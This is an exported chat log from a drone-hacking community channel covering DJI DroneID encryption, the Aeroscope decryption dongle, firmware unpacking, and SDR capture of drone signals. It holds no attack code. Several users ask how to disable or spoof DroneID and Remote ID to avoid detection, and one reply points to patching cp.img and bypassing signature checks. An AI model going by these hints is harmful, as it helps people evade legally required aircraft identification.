We have fun toys, and great BBQ. If you follow android, Nintendo or DJI hacking, you probably know of more than a few of us.
Jon@cunninglogic.com
[2024-01-13 14:18:09]
dkovar :
Absolutely encourage people to look into this opportunity. The company is very well established and has an excellent reputation.
[2024-01-13 14:31:15]
konraditurbe :
Not many people with the level of skillset jcase and other OGs have.
[2024-01-13 15:04:47]
jcase :
@dkovar thank you. I'm trying to get more talent before I have to take leave for surgery.
[2024-01-13 15:04:52]
jcase :
but dude that means a lot
[2024-01-13 15:54:35]
dkovar :
You've helped me out for years, and I've known the company for almost as long. You are all great people.
[2024-01-13 17:36:38]
jcase :
yeah, first company ive stayed with for more than a year (5 yrs with company, 6 on my contract)
[2024-01-13 17:36:45]
jcase :
only place that ive always felt respected
[2024-01-16 14:36:10]
zjm605186980 :
zjm605186980 joined the channel.
[2024-01-16 22:38:51]
drone_paki :
drone_paki joined the channel.
[2024-01-17 01:08:07]
enk2022 :
According to the paper "DJI drone IDs are not encrypted": https://arxiv.org/ftp/arxiv/papers/2207/2207.10795.pdf
There are two types of DroneID packets, Fig 9 and 10. Have anyone ever seen the packet format in Fig. 9?
[2024-01-17 04:10:52]
eseven :
@enk2022 Yep, you can find both of them even a third one.
[2024-01-17 09:45:21]
photogrant :
photogrant joined the channel.
[2024-01-17 13:45:31]
knorz :
knorz joined the channel.
[2024-01-18 09:08:13]
slickstretch :
slickstretch joined the channel.
[2024-01-18 15:43:17]
basilius :
basilius joined the channel.
[2024-01-21 11:56:20]
neuralz :
neuralz joined the channel.
[2024-01-22 09:26:51]
ghhh :
ghhh joined the channel.
[2024-01-26 17:07:38]
jcase :
there are more than 2 types, and newer ones are encrypted
[2024-01-26 17:08:00]
jcase :
off the top of anyone's head, does anyone know which key is used to decrypt AS firmware? i cant get my notes now
[2024-01-28 22:32:22]
hito_no_yume :
Oh droneID is finally encrypted then? That is interesting, how did they manage to push the encryption key to existing aeroscopes?
[2024-01-28 22:35:03]
konraditurbe :
"Upgrade Module" physical device that plugs into aeroscope, allegedly.
[2024-01-28 22:36:32]
hito_no_yume :
That makes sense, if it was hidden inside a firmware update, I am sure someone in this group would have already extracted it. People here are amazing at what they are doing :smile:
[2024-01-29 14:45:09]
jcase :
hardly allegedly, i have some here
[2024-01-29 20:57:51]
lining-preps.0u :
lining-preps.0u joined the channel.
[2024-01-29 21:58:14]
hito_no_yume :
So theoretically, wouldn't it be possible to extract the key from these upgrade modules? Does this really provide a proper safety to make sure the key doesn't get leaked?
[2024-01-29 22:10:31]
jcase :
i know people disagree with me, but obfuscation and packing is a form of security. Security is a cost benefit ratio
[2024-01-29 22:10:42]
jcase :
if you can cost the attackers enough money and time
[2024-01-29 22:10:52]
jcase :
then you may win
[2024-01-29 22:11:04]
jcase :
that is what DJI tries to do with this, their use of ollvm and secneo
[2024-01-29 22:11:06]
jcase :
i mean, it fails
[2024-01-29 22:29:36]
nmikus :
anyone seen a drone that puts out encrypted droneID pkts?
[2024-01-30 04:46:45]
eseven :
dji mini 4 pro
[2024-01-30 05:18:04]
nmikus :
do you know which FW version they started sending encrypted pkts?
[2024-01-30 06:44:27]
drone_fancy :
drone_fancy joined the channel.
[2024-01-30 08:19:03]
eseven :
Last one from December.
[2024-01-30 08:29:31]
eseven :
Dongle is a 2-interface USB hub. One interface is used to "bypass" the already connected USB (CrystalSky/4G Dongle). The other interface has a USB gadget on it.
The gadget is cross-correlated with an Aeroscope at first start. Then it will work only on that Aeroscope. (or not ;) )
[2024-01-30 08:33:53]
drone_fancy :
hi guys, I have a question, could I use CIAJeepDoors to disable DroneID in Mavic 3 Pro/Mavic 3 Pro Cine?
[2024-01-30 10:42:38]
jcase :
No
[2024-01-30 10:53:08]
jcase :
Again cia jeep doors does not disable droneid
[2024-01-30 10:53:24]
jcase :
Please read the repo
[2024-01-30 10:53:34]
jcase :
Before applying it
[2024-01-30 10:53:53]
jcase :
Only certain drones and certain firmware
[2024-01-30 10:54:02]
jcase :
Have any benefits
[2024-01-30 11:07:26]
pingspike :
@eseven what's inside the "USB gadget" :smiley:
[2024-01-30 11:17:12]
eseven :
It is a gadget device, that responds to some specific commands.
It is completely sealed, but has two test pins on it...
Does anyone have experience on how to read/use those pins?
[2024-01-30 11:22:17]
jcase :
Top four are standard us
[2024-01-30 11:22:22]
jcase :
Bottom right is ground
[2024-01-30 11:22:32]
jcase :
Bottom left goes to a capacitor then to the ic
[2024-01-30 11:23:06]
jcase :
@eseven some capacitors, some resistors, a crystal and a ic
[2024-01-30 11:23:10]
jcase :
Err
[2024-01-30 11:23:16]
jcase :
@pingspike
[2024-01-30 11:50:01]
eseven :
Interesting.
[2024-01-30 20:42:19]
serg.gangubas :
serg.gangubas joined the channel.
[2024-01-31 02:03:06]
nmikus :
crypto looks like https://www.openssl.org/docs/man1.1.1/man7/SM2.html do they pull the private key off the dongle? or is it all just some gadget protocol?
[2024-01-31 03:48:53]
eseven :
They pull the key from the dongle.
Could be based on the elliptic curve algorithm SM2, but key requests seem to be dynamic in time. I thought it could be time based, but I'm not sure, since many mobile devices are not time synced.
Then... any ideas?
[2024-01-31 04:39:37]
nmikus :
so you have the key off the dongle?
[2024-01-31 11:50:40]
jcase :
The symmetric key is pulled off dongle
[2024-01-31 11:50:55]
jcase :
The asymmetric stays on dongle
[2024-01-31 12:04:59]
jcase :
The symmetric key changes per packet, providing it is the entire purpose of the dongle
[2024-01-31 13:41:35]
eseven :
In the packet, is there any reference to know which key to request from the dongle? Afaik AS requests keys from the dongle..
[2024-01-31 14:26:59]
nmikus :
gross so they did it the right way, there is a hash of the symmetric key to track requests
[2024-01-31 16:04:08]
nmikus :
the symmetric seems to change per boot, the IV changes per pkt counter mode...
[2024-01-31 21:51:12]
hito_no_yume :
Does that mean the symmetric key, like an AES key, is generated per packet instead of being a fixed key? But then both the drone and the dongle have to know how to generate this key? Shouldn't it be possible to find the dongle's logic in the drone's firmware then?
[2024-01-31 21:54:04]
hito_no_yume :
Unless the key is generated asymmetrically. Now I see it: the drone generates the key using some dynamic information + the dongle's public key, and then aeroscope sends the dynamic information based on the packet to the dongle, which then decrypts it using the private key and sends back the symmetric key, AES key or whatever that is.
[2024-01-31 21:56:11]
hito_no_yume :
Where do you guys find this implementation in the firmware? I would love to see how it is implemented there, seems like a really good and a secure design if it is really implemented that way
[2024-01-31 22:11:40]
nmikus :
fairly textbook in terms of using asymmetric to protect your symmetric key. So you get the speed of symmetric and the security of asymmetric...
[2024-01-31 22:21:32]
nmikus :
just need someone with HW skillz to crack one of these things open and dump the key
[2024-01-31 22:23:52]
nmikus :
how does one get one of these things anyway? does DJI just reach out to all owners of AS boxes or do you need to request one?
[2024-02-01 01:27:19]
jcase :
.... :)
[2024-02-01 01:27:59]
jcase :
Good luck under any circumstances if you are in a western country right now
[2024-02-01 01:47:43]
jcase :
It took me months to secure the ones I have.
[2024-02-01 02:06:24]
nmikus :
sounds fun
[2024-02-01 09:44:30]
rachfly :
what exactly? :)
[2024-02-05 04:18:47]
anthony :
anthony joined the channel.
[2024-02-06 19:57:57]
ryantkasher :
ryantkasher joined the channel.
[2024-02-07 14:36:25]
drone_king123 :
drone_king123 joined the channel.
[2024-02-10 04:05:10]
avg.bob :
avg.bob joined the channel.
[2024-02-12 07:47:55]
mehr :
Internal IC of the dongle. Anyone know the part?
[2024-02-12 08:04:52]
tmbinc :
Isn't that just the USB hub?
[2024-02-12 08:22:00]
eseven :
Yep, an USB hub. Interesting part is at metal Dongle attached to it. (QR Code)
[2024-02-12 08:39:11]
mehr :
Of course. That's right. My mistake.
Now the question is "part# of the IC inside the metal dongle".
Generating a dumper seems interesting to me.
[2024-02-12 15:56:44]
lapse98 :
Looking for an AS sim to generate random traffic to help with software integration. Not getting enough traffic from actual AS.
[2024-02-12 16:03:43]
jcase :
is this an individual project, or a business/government one? As I have such a thing
[2024-02-12 18:00:20]
eseven :
What Kind of traffic do you want to generate? flights?
[2024-02-12 19:03:44]
lapse98 :
Flights to push into software. Not looking broadcast or spoof. Not enough flights on Aeroscope this February with our cold New England weather. Engineers need simulated data.
[2024-02-12 19:50:52]
jcase :
such a familiar sounding issue lol
[2024-02-12 19:51:06]
jcase :
i was damn near in the middle of the rainforest ... i never got flights except for me
[2024-02-12 22:33:50]
konraditurbe :
Yeah just sticks towards center and don't need to even take off of the ground
[2024-02-15 04:11:19]
ghhh :
Has anyone had success turning off the droneid on Air2S? CIAJeepDoor only changes privacy bits...
[2024-02-15 04:14:43]
ghhh :
I checked the hdvt_uav service and was able to stop the drone ID update, but could not stop the transmission itself.
[2024-02-15 04:14:48]
ghhh :
should i check cp.img ??
[2024-02-15 04:39:17]
nmikus :
to prevent it you would need to patch the modem/dsp code
[2024-02-15 05:08:46]
ghhh :
I know, but I just want to know which file I need to patch.
[2024-02-15 05:08:52]
ghhh :
I thought it was hdvt_uav, but it doesn't seem to be
[2024-02-15 05:14:03]
nmikus :
cp.img would need to be patched, and you would need to bypass the signature verification stuff
[2024-02-15 05:19:55]
ghhh :
thx.
[2024-02-16 15:17:44]
robbe7730 :
robbe7730 joined the channel.
[2024-02-19 06:25:02]
vindia :
vindia joined the channel.
[2024-02-20 08:18:06]
weristdas :
weristdas joined the channel.
[2024-02-20 15:50:33]
jonathanselis :
jonathanselis joined the channel.
[2024-02-24 11:44:02]
efwefaf :
Does anyone need a DJI T50 that can fly globally
[2024-02-24 11:51:50]
fgzdf :
fgzdf joined the channel.
[2024-02-24 12:18:35]
jcase :
@efwefaf i have interest in a t50, but i dont care if it can fly globally or not
[2024-02-24 12:21:18]
efwefaf :
Do you need to purchase T50
[2024-02-24 15:25:41]
jcase :
what price
[2024-02-25 17:40:54]
efwefaf :
32000RMB
[2024-02-25 18:52:56]
flylusive_pat :
@efwefaf Do you have export license? They require certificate to export
[2024-02-29 00:04:28]
joelg :
Any way to keep drone id disabled with ios yet? Air2s
[2024-02-29 09:15:04]
zkar :
Are there known ways how to gain root access on recent FW versions of the aeroscope?
[2024-02-29 09:16:59]
zkar :
I do remember ways about shell injection but I assume that this is closed now?
[2024-02-29 16:20:45]
jcase :
I have a totalphase 480 usb analyzer im looking to sell. Made many an android and a DJI exploit using this tool. US Based, have box and all tidbits that came with it. Looking for $700, they are 1300 new and 800+ used on ebay. I dont want to deal with ebay. If you are working on the decryption dongle, you probably want one of these.
[2024-03-01 10:31:17]
zkar :
Can recommend that. :+1:
[2024-03-01 11:30:08]
jcase :
they rock, im trying to avoid the ebay route lol
[2024-03-01 11:30:20]
jcase :
i have long standing issues with the ebay security team lol
[2024-03-01 15:39:29]
dkovar :
quelle surprise
[2024-03-02 07:24:23]
eseven :
Really useful to reverse usb comms!!
[2024-03-02 11:59:54]
jcase :
and to debug usb based exploits lol
[2024-03-02 16:35:55]
efwefaf :
Does anyone need the RC PLUS remote control? It can be modified to support M300 M350 M3E M3T M3M M30T Mavic 3 3C 3PRO MINI3 AIR2S Inspire 3
[2024-03-05 12:46:51]
fenerx03 :
fenerx03 joined the channel.
[2024-03-05 19:50:25]
tissy :
Does anyone know, is there a specific pattern or format to DJI serial numbers that can aid in identifying different models please?
[2024-03-05 21:17:56]
cs2000 :
There was a tool on the wiki (http://tools.retroroms.info/) that could decode the serial numbers, but it seems to be broken. He probably does not come here anymore, but I will tag @czokie in case he sees this message and feels like fixing it.
[2024-03-06 00:10:24]
czokie :
Hey. Got the ping. Let me have a peek at it.
[2024-03-06 00:33:27]
czokie :
Fixed. The back-end has stuff in a stored procedure, and the stored procedure table was marked as crashed in the database. Repaired and back up.
[2024-03-06 01:23:18]
johnnokomis :
I'm seeking information on how to perform this firmware mod. Is it the same process as changing an RC Pro Enterprise to a regular RC Pro? I've done that many times, but DJI Fly disappears the moment you reboot the RC. Does the same not happen with the RC Plus?
[2024-03-06 01:40:09]
tissy :
Thank you @czokie. Does this support certain devices or all please?
[2024-03-06 08:13:58]
czokie :
It will get the date for any device - identification of which device it is ... that's based on a lookup table that I will update one day, but less important - if you've already got the device, you know what it is :)
[2024-03-07 21:05:08]
jcase :
writeup on the dongle https://www.edgesource.com/c-suas/
[2024-03-07 21:13:17]
dkovar :
Nice work.
[2024-03-08 05:36:17]
djihacker :
djihacker joined the channel.
[2024-03-08 09:48:17]
djihacker :
So without the private key in aeroscope, decrypting droneID would be impossible.
[2024-03-08 12:19:49]
jcase :
that is not necessarily true
[2024-03-08 13:43:38]
djihacker :
After reading the article you shared, I think there is a fixed public key in the firmware (paired with the private key in aeroScope) that is used to encrypt the public and private key pair generated after the drone is turned on. After the encryption is completed, it is sent to aeroScope, and aeroScope stores this key-map. Subsequent DroneIDs are encrypted using the public key generated at startup, and then packaged. The public key is exposed in the DroneID encryption package and sent to the aeroScope end. The aeroScope end uses the private key in the received key-map to decrypt this DroneID data, so if you want to decrypt DroneID, you need to first obtain the private key generated by the drone. The private key generated by the drone is encrypted with the public key of aeroScope. Only the private key stored in the dongle of aeroScope can decrypt it.
[2024-03-08 13:45:20]
jcase :
session id
[2024-03-08 13:45:52]
jcase :
the dongle has a private key, decrypts the session id, and spits out an aes key
[2024-03-08 13:50:46]
djihacker :
Yes I totally agree with you, but I haven't verified it yet. Currently I just rooted my dji mini 4 pro and executed reboot -p and it still sends DroneID pkt, I don't even know where to analyze its encryption process.
[2024-03-08 14:02:51]
jcase :
its in the flight controller
[2024-03-08 14:03:03]
jcase :
mini4 pro is actually one i have not seen
[2024-03-08 14:03:17]
jcase :
is your work on it public
[2024-03-08 14:10:14]
djihacker :
OK Thank you very much. I am preparing to analyze FC haha. I will use my spare time in the next week to complete this interesting topic and make it public. Mini 4 pro has two emmcs, where did the fc firmware come from? Is there any way to debug it? Is the best way to use ida static analysis? :grinning:
[2024-03-08 14:32:45]
djihacker :
I found a way to analyze it, so cool.
[2024-03-09 08:21:18]
djihacker :
There is a problem, when using dji_imah_fwsig.py to unpack the .sig file, there is an exception: /Users/mac/Desktop/_V01.00.0300_wa140_dji_system.bin.extracted/wa140_1502_v10.08.04.08_20231220.pro.fw.sig: Warning: Image file head signature verification caused cryptographic exception: Incorrect signature
Error: Image file head signature verification failed. Is it because the decryption key is incorrect? Where should I find the secret key?
[2024-03-09 10:19:43]
djihacker :
I downloaded the latest firmware of the dji mini 4 pro from DDD, used binwalk to export some .sig files, and then used dji_imah_fwsig.py to decrypt, but it reported an error. I analyzed the code and found that the key was wrong, so I want to know how to find the key? Analyze dji_upgrade and extract it from there?
[2024-03-09 12:32:08]
jcase :
since you have root on the device, you could either dump decrypted firmware off it, or you can follow back where the key comes from when it updates
[2024-03-09 13:13:38]
djihacker :
OK, thank you for the idea, I'm analyzing it. There is an interesting thing: the mini4 pro has two emmc storages, and both have linux system files. The contents of start_dji_system.sh can be observed to be different. There are also many core dji_xxx.so of different sizes. Even after I execute reboot -p, my mini 4 pro can continue to connect to the rc, which is really shocking. Maybe the Linux system in the other emmc storage is working. Is there fc firmware in the emmc that I currently have root permissions on? If so, I can directly extract the FC. But parsing the bin firmware is a very interesting thing, and I will continue to complete this task in the future.
[2024-03-10 18:10:08]
jcase :
this is common
[2024-03-12 15:50:39]
sdfg4711 :
sdfg4711 joined the channel.
[2024-03-13 06:48:40]
djihacker :
When I hook this address, this will cause a crash. I don't know if inline hooks are unstable. Is there a better way to get the value of W8 register?
[2024-03-13 07:20:32]
djihacker :
I see the problem, I should not write leave, because it is inline :rolling_on_the_floor_laughing:
[2024-03-21 10:39:34]
urca87 :
@tmbinc and @hito_no_yume, could I trouble you guys over this old thread? I'm trying to analyze the first 2 symbols of a few downlink packages recorded without RC connection, but I have a few doubts and maybe I didn't fully understand what you where saying.
[2024-03-21 10:51:56]
urca87 :
@tmbinc and @hito_no_yume , could I trouble you guys over this old thread? I'm trying to analyze the first 2 symbols of a few downlink bursts recorded without RC connection, but I have a few doubts and maybe I didn't fully understand what you where talking about.
Once I've removed those 4 every 20 bits that differ among different bursts (except 8 bits at the beginning and other 8 at the end that do not follow this scheme precisely), I cannot isolate the golden seed and I have a few doubts about it:
- you're talking about 78 bits, but shouldn't the golden seed's x2_init be 31 bits long?
- I've also tried to search for the repetition of these 78 bits among the 1920 I've extracted from the first two symbols, but without any match.
Am I missing some steps? Your help would be appreciated.
[2024-03-22 00:29:01]
jcase :
does anyone have an up to date aeroscope WITH crystal sky?
[2024-03-22 01:00:25]
hito_no_yume :
I don't quite remember the actual values, but if you removed the differing bits and then XORed with the right golden sequence you will get repeating bits. You won't find repeating bits before descrambling. I think also if you look at enough captures, sometimes you could also see a golden sequence in the first few symbols, but that doesn't happen frequently I believe, and maybe it also doesn't apply to every drone, I don't know
[2024-03-22 08:54:53]
urca87 :
I think I got confused on some concepts, in my previous understanding the first symbols were not scrambled, I will try to get more into the concept behind the golden sequence. Anyway, thanks a lot for your response hito
[2024-03-22 13:06:22]
fr3style :
fr3style joined the channel.
[2024-03-26 08:21:37]
mrwg888 :
mrwg888 joined the channel.
[2024-04-04 19:11:03]
propz :
propz joined the channel.
[2024-04-04 22:56:45]
amat :
amat joined the channel.
[2024-04-11 13:09:49]
halowarrior8 :
halowarrior8 joined the channel.
[2024-04-13 01:54:33]
antf1551 :
antf1551 joined the channel.
[2024-04-13 17:56:26]
the_mini2_guy :
the_mini2_guy joined the channel.
[2024-04-16 05:41:12]
metalhax :
metalhax joined the channel.
[2024-05-02 07:38:27]
s1m0n :
Guys, I have an Air3 with deactivated DroneID. Latest firmware and latest DJI Fly version. The problem is that RID is still being sent. That means any idiot can locate me with a smartphone and doesn't need an Aeroscope. Is there a way to turn off RID as well or to fake/spoof the values?
[2024-05-03 00:37:03]
jcase :
what makes you think you deactivated drone ID?
[2024-05-03 07:07:18]
s1m0n :
Because CIAJD displayed 1111111 everywhere. When I pressed the disabled command, an error occurred. After I sent the drone away and got it back, CIAJD now shows 00000000. So something has to be changed, or am I seeing it wrong? Do you know of any ways to make CIAJD display incorrect values?
[2024-05-03 07:15:52]
s1m0n :
As far as I know, DJI has removed the command, but the possibility to read the status (DroneID) still exists
[2024-05-03 14:31:43]
jcase :
@s1m0n CIAJD NEVER disabled AS
[2024-05-03 14:31:52]
jcase :
it censored some parts of it on some devices
[2024-05-03 14:32:37]
jcase :
your drone doesnt have AS disabled.
[2024-05-03 17:03:48]
s1m0n :
Do you have an explanation for why or how the values can permanently display 0000000?
[2024-05-03 17:06:40]
konraditurbe :
Bug / leftover code in the firmware. But all useless.
[2024-05-03 17:12:49]
s1m0n :
Well, if that were the case, then there must be someone here who can explain how to trigger this error? After all, this service was offered to me and, as far as I can check, it was also provided. So if this is all a "bug", can someone please explain how someone else can bring about this permanent change? (No matter if it really works or is just showing a wrong value)
[2024-05-03 20:22:10]
jcase :
yes i can make them display 0000000 at all times, it doesnt disable drone id
[2024-05-03 20:22:47]
jcase :
privacy bits can not fucking be used to disable drone id
[2024-05-03 20:22:52]
jcase :
not sure how many times i have to say that in here
[2024-05-03 21:25:26]
s1m0n :
I don't understand how many times I have to tell the professionals that this is a reference! Until FW 01.01.0400 it was possible for me to read the status of CIAJD and to SEND the "Disabled Command" (this is the name of the button in CIAJD = comm_serialtalk command). The status then displayed 0000000, but jumped back to 111111111 on the first takeoff of the drone, as the recommended Fly version 1.5.10 cannot be used with the Air3. With the introduction of FW 01.00.0600 it was only possible to read the status with CIAJD. If you try to send the "Disabled Command", you get an error and the status no longer changes. After I sent my Air3 to a service center in another country, the status permanently shows 0000000. So far so clear? So you are able to fake this status? May I ask if you know of any verification methods (other than AS) to check if such a fake has been applied?
[2024-05-03 21:26:00]
s1m0n :
I don't understand how many times I have to tell the professionals that this is a reference! Until FW 01.01.0400 it was possible for me to read the status of CIAJD and to SEND the "Disabled Command" (this is the name of the button in CIAJD = comm_serialtalk command). The status then displayed 0000000, but jumped back to 111111111 on the first takeoff of the drone, as the recommend Fly version 1.5.10 cannot be used with the Air3. With the introduction of FW 01.00.0600 it was only possible to read the status with CIAJD. If you try to send the "Disabled Command", you get an error and the status no longer changes. After I have sent my Air3 to a service center in another country, the status permanently shows 0000000. So far so clear ? So you are able to fake this status? may I ask if you know of any verification methods (other than AS) to check if such a fake has been applied?
[2024-05-03 21:28:00]
s1m0n :
Would such an intervention retain all user-defined settings (parameter settings, FCC patch), or would the drone be reset to factory settings?
[2024-05-03 21:28:36]
konraditurbe :
Leave it seriously. It's not possible on Air 3 unless you get access to some very secretive firmware which I doubt even exists.
[2024-05-03 21:32:08]
s1m0n :
I'm sorry, but it doesn't make sense for me to send my Air3 across several countries and receive it back again if it's a scam.
[2024-05-03 21:35:38]
s1m0n :
But if there is someone here who has an older biography and is trustworthy and has an AS to verify or disprove it, I would be willing to send the drone again. So please contact me.
Nevertheless, I will sell the drone as soon as I can. The whole thing makes just as little sense with Remote ID as it does with Drone ID.
[2024-05-03 21:45:03]
s1m0n :
Why should it be a special firmware? Is this procedure no longer valid? Or do you seriously believe that DJI would send the customer a firmware that has not yet been leaked? @konraditurbe
[2024-05-03 21:46:55]
s1m0n :
I know that "flysafe" no longer exists, but that doesn't change the fact that there was an official procedure, or has it been discontinued?
[2024-05-03 21:48:02]
konraditurbe :
"Is this procedure no longer valid" exactly, CIAJeepDoors is no longer valid. It was "valid" for 1-2 months at most. And "valid" is a big word, it didn't do what many thought it did.
[2024-05-03 21:48:48]
s1m0n :
Am I talking about CIAJD, or an official reference to DJI?
[2024-05-03 21:49:01]
konraditurbe :
Do what I did, get an Air 2 and Air 2S, next purchases I'll do will be Mini 2 (Gen 1/2 compatible with jeep doors) and Mavic 3 wm260.
[2024-05-03 21:50:15]
konraditurbe :
That paragraph you posted is KF pondering *why* DJI does not handle this. It never existed. DJI never acknowledged the privacy bits, so "fly safe" here is irrelevant.
[2024-05-03 21:54:16]
s1m0n :
I myself have a Mavic Pro Platinum, 3 or 4 Mini 2 and an Air 2S. That's not the thing! And it doesn't help to find out whether a fraudster is on the move or not.
I see it differently. Back then, you didn't install a switch if you didn't use it.
[2024-05-03 22:28:03]
jcase :
@konraditurbe privacy bits were initially for a non public edition of flight apps
[2024-05-03 22:28:46]
jcase :
At least that is where I first saw settings and documentation on it
[2024-05-03 22:32:32]
jcase :
@s1m0n 99% of the ppl that talk about disabling drone id don't have the capability to detect it or not. Ciajd just censors ( better than nothing if you need it but not for evading detection).
[2024-05-04 01:17:46]
s1m0n :
CIAJD served me well for 2 years. Then I had the Air3, flew 11 times in 4 days and had a visit from air security
[2024-05-04 01:21:42]
jcase :
thats great, its not a droneid disable, it censors some parts
[2024-05-04 01:57:14]
s1m0n :
Yes, I know. I've been toying with switching to custom drone for a while now, the problem is that if I did I would want the o3 system and that also sends the DroneID as far as I could find out. Maybe it's time to get rid of those drones and just keep the mini2... that's actually enough for relaxed flying
[2024-05-06 19:46:58]
pingspike :
anyone have a mobile aeroscope for sale? must be willing to ship to the UK via international insured courier (UPS, DHL, FedEx, etc)
[2024-05-06 21:38:52]
dkovar :
What are you offering?
[2024-05-07 06:36:16]
pingspike :
What's the going rate on the second hand market? :shrug_light_skin_tone: These things seem almost impossible to find these days :thinking_face:
[2024-05-07 06:44:48]
pingspike :
Ok, just found out how much they go for, I'll withdraw my request now and wear a rather sheepish look on my face for the rest of the day
[2024-05-07 12:34:09]
dkovar :
Since I have one, can you share the going price?
[2024-05-07 12:45:43]
sarange :
sarange joined the channel.
[2024-05-07 14:00:52]
jcase :
the last retail price i saw was $20,000, however i've heard of people offering and paying more now due to shortage
[2024-05-07 14:38:01]
konraditurbe :
20k without upgrade module that is, no?
[2024-05-07 15:04:51]
dkovar :
Wow.
[2024-05-07 15:20:11]
jcase :
Does anyone (and I'm using the wrong term here, I'm not an SDR person) have a "data stream" from an SDR of DroneID packets?
[2024-05-07 15:20:25]
jcase :
like raw?
[2024-05-07 15:20:55]
jcase :
my SDR unfortunately got damaged, and an academic friend asked for an example
[2024-05-07 15:21:17]
jcase :
freaking sdr appears to have a short between layers, i ended up pulling ALL the components off it .. and still have a short
[2024-05-07 16:07:58]
tmbinc :
"IQ recording"
https://github.com/RUB-SysSec/DroneSecurity/tree/public_squash/samples has samples.
[2024-05-07 18:12:08]
jcase :
@tmbinc thank you
[2024-05-09 00:02:26]
punishman :
punishman joined the channel.
[2024-05-10 20:14:50]
indimind :
indimind joined the channel.
[2024-05-12 14:30:16]
symza :
symza joined the channel.
[2024-05-17 11:29:56]
hash512 :
hash512 joined the channel.
[2024-05-19 11:45:02]
efwefaf :
Does anyone know how to change the img file and recalculate the CRC verification
[2024-05-20 08:14:47]
fruits_biology :
fruits_biology joined the channel.
[2024-05-22 01:53:11]
djihacker :
Does anyone know how to extract firmware from a usb device
[2024-05-22 02:25:56]
caracara :
caracara joined the channel.
[2024-05-23 14:53:07]
jcase :
this is a super vague question. Yes i do, but only applies to devices ive done it to. What device are you talking about
[2024-05-24 05:31:56]
djihacker :
A friend gave me a dongle to get the algorithm inside, and I didn't know where to start working.
[2024-06-03 07:34:53]
mymail :
mymail joined the channel.
[2024-06-03 14:42:33]
devinnorgarb :
devinnorgarb joined the channel.
[2024-06-07 08:34:59]
ginostred :
Hello everyone, I have a question about the frequencies used to transmit droneID packets. Does anyone know if the hopping sequence varies from drone to drone? I noticed that the list of channels on which droneID packets are sent is not always the same from various references found online. Based on my experience using an Air 2, for example, I am unable to find droneID packets on certain frequencies like 2399.5 MHz and 2474.5 MHz
[2024-06-13 13:52:28]
qw591132059. :
qw591132059. joined the channel.
[2024-06-15 18:06:47]
beammp :
beammp joined the channel.
[2024-06-19 10:41:04]
enk2022 :
did you see these two frequencies?
[2024-06-21 07:04:25]
ginostred :
No. I also checked with a DJI FPV of a friend but couldn't see any packet on those frequencies. I guess the hopping sequence is a variable pattern, because 2399.5 MHz has been found in here https://github.com/proto17/dji_droneid and 2474.5 MHz was found here https://doi.org/10.48550/arXiv.2207.10795
[2024-06-22 22:40:49]
qr25 :
qr25 joined the channel.
[2024-06-24 14:34:49]
devnull :
devnull joined the channel.
[2024-06-26 13:40:30]
kowoos :
kowoos joined the channel.
[2024-06-26 23:33:10]
johnibhramin :
johnibhramin joined the channel.
[2024-07-01 17:28:58]
mrsmith :
mrsmith joined the channel.
[2024-07-06 14:18:16]
chengcheng :
chengcheng joined the channel.
[2024-07-07 13:59:49]
skynettech :
skynettech joined the channel.
[2024-07-20 10:08:12]
cforge :
cforge joined the channel.
[2024-07-23 22:19:16]
mgri3 :
mgri3 joined the channel.
[2024-07-24 12:18:13]
d0ps :
d0ps joined the channel.
[2024-07-24 20:41:59]
strawhat99 :
strawhat99 joined the channel.
[2024-07-26 15:52:30]
ogini_ayotanom :
ogini_ayotanom joined the channel.
[2024-07-31 20:59:42]
hate :
hate joined the channel.
[2024-07-31 21:01:34]
hate :
And here i am. Back to where I started.
[2024-08-01 10:23:57]
pingspike :
:eyes:
[2024-08-02 11:49:47]
hate :
Guys, DroneID / RemoteID are only broadcasted on 2.4, 5.2, 5.8 right? No other frequencies?
[2024-08-02 11:50:14]
hate :
Just between those right?
[2024-08-02 17:15:30]
eseven :
5.2?
[2024-08-03 15:02:20]
zhangbajie :
zhangbajie joined the channel.
[2024-08-06 12:21:19]
superfokeryou :
superfokeryou joined the channel.
[2024-08-14 20:44:14]
dezz :
dezz joined the channel.
[2024-08-16 13:54:48]
yoyo :
yoyo joined the channel.
[2024-08-17 11:04:58]
gg02 :
gg02 joined the channel.
[2024-08-17 19:41:47]
zyxel :
zyxel joined the channel.
[2024-08-22 14:38:12]
swaggyc :
swaggyc joined the channel.
[2024-08-31 05:46:42]
zar1n :
zar1n joined the channel.
[2024-09-02 01:41:24]
devoir :
devoir joined the channel.
[2024-09-15 22:40:24]
east2west :
east2west joined the channel.
[2024-09-22 18:10:28]
mangobot :
mangobot joined the channel.
[2024-10-07 18:42:54]
tokertm :
tokertm joined the channel.
[2024-10-09 08:31:13]
vikvel :
vikvel joined the channel.
[2024-10-09 08:49:50]
vikvel :
Hi! Can you tell me how to flash the aeroscope with a new firmware (offline)?
[2024-10-09 18:02:04]
tissy :
When you say "flash" are you referring to the upgrade with the dongle?
[2024-10-21 01:52:56]
supermario7331 :
supermario7331 joined the channel.
[2024-11-08 12:50:04]
jcase :
If anyone in the US is looking for CUAS sensors, I have a couple available at a steep discount. Located in North Carolina. Works on a lot of manufacturers, various types of traditional detection in addition to remoteid, droneid + encrypted drone id. Need them out of the work space, going different direction.
[2024-11-08 13:51:32]
cyberdjomla :
cyberdjomla joined the channel.
[2024-11-13 09:13:15]
rachfly :
which direction? :)
And which systems do you sell?
[2024-11-14 05:29:13]
ghhh :
- If you are selling the product, can you tell me the catalog or website? And is it only sold in the United States?
[2024-11-21 14:25:54]
jcase :
its a lizheng df8, not a product "im selling" just unneeded equipment, US only
[2024-11-21 15:45:53]
jcase :
I've spun up a discord server geared towards the CUAS/UAV/UAS professional, mainly security, policy, forensics, red teams, etc. If there is interest https://discord.gg/XS3YRFa3 . Anyone is welcome but it is not geared towards the "how do i turn off droneid" or the "how do i remove NFZ" crowds. Do expect law enforcement members.
[2024-11-24 12:12:42]
ox3d :
ox3d joined the channel.
[2024-11-26 18:08:53]
isleemo :
isleemo joined the channel.
[2024-12-02 14:53:54]
karbauskis.karbauskis :
karbauskis.karbauskis joined the channel.
[2024-12-03 10:37:34]
bearer :
bearer joined the channel.
[2024-12-16 12:30:14]
c3podaniel :
c3podaniel joined the channel.
[2024-12-19 00:38:35]
jayj :
jayj joined the channel.
[2025-01-08 20:36:06]
mikha_fpv :
mikha_fpv joined the channel.
[2025-01-15 18:24:17]
xexe :
xexe joined the channel.
[2025-01-17 16:01:52]
skyninja :
Does anybody know what the Skylink on the Autel EVO Max is based on? Do they use a certain chip?